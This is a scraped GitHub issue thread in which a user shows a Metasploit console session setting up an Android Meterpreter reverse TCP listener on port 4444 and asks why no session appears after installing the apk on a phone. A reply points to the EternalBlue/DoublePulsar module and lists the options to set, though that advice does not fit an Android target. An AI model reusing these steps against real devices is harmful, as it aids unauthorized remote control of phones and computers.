You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.*.**
LHOST => 10.**.*.**
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.0.*.**: 4444
msf6 exploit(multi/handler) >
I also install the apk file in phone but system is not able to get the device.
i also use exploit instead of exploit -j but the problem is same.
help me out solving this problem I am stuck.
The text was updated successfully, but these errors were encountered:
AqeelTariq97
changed the title
[*] Exploit completed, but no session was created.
[*] Exploit completed, but no session was created.___kali linux
Dec 15, 2020
Dont use multi handler, type into the msfconsole search eternalblue_doublepulsar it l should come up as 0 so just type use 0 then set the payload, Eternalbluepath, Doublepulsarpath, RHOSTS, winepath and the targetarchitecture
I also install the apk file in phone but system is not able to get the device.
i also use exploit instead of exploit -j but the problem is same.
help me out solving this problem I am stuck.
The text was updated successfully, but these errors were encountered: